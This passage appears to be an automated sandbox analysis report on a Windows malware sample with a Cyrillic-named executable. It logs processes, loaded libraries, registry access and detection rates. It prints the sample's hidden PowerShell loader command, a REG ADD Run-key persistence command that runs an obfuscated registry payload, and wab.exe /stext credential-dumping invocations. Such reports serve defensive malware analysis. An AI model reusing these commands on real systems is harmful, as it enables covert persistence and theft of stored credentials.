            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeFile created: C:\Users\user\AppData\Local\Temp\nsx4D4B.tmpJump to behavior
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: wab.exe, wab.exe, 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: wab.exe, wab.exe, 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: wab.exe, 00000008.00000002.3763205114.00000000211B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: wab.exe, wab.exe, 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: wab.exe, wab.exe, 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: wab.exe, wab.exe, 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: wab.exe, 0000000D.00000002.1717313171.0000000004A2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: wab.exe, wab.exe, 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeReversingLabs: Detection: 42%
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeVirustotal: Detection: 29%
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeFile read: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_14-33247
            Source: unknownProcess created: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe "C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe"
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Forstbotanikkens=Get-Content 'C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Entreprenren.Out';$Vaabentypers=$Forstbotanikkens.SubString(61389,3);.$Vaabentypers($Forstbotanikkens)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\frrlxvvcyajmkjprpxzqdq"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\frrlxvvcyajmkjprpxzqdq"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\itedxngwlibzmqlvhhlsguxrsq"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\snjwygrxzqtexwzhqsglqhsitfuae"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\snjwygrxzqtexwzhqsglqhsitfuae"
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Forstbotanikkens=Get-Content 'C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Entreprenren.Out';$Vaabentypers=$Forstbotanikkens.SubString(61389,3);.$Vaabentypers($Forstbotanikkens)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\frrlxvvcyajmkjprpxzqdq"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\frrlxvvcyajmkjprpxzqdq"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\itedxngwlibzmqlvhhlsguxrsq"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\snjwygrxzqtexwzhqsglqhsitfuae"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\snjwygrxzqtexwzhqsglqhsitfuae"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)"Jump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeFile written: C:\Windows\Fonts\tashlik.iniJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb28 source: powershell.exe, 00000002.00000002.1653002367.000000000779C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.1653002367.000000000784C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.1648040628.00000000032BD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbt.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32D source: powershell.exe, 00000002.00000002.1655544502.00000000089A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.1655544502.00000000089A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Core.pdbn3 source: powershell.exe, 00000002.00000002.1653002367.000000000784C000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000002.00000002.1656034201.00000000093F7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
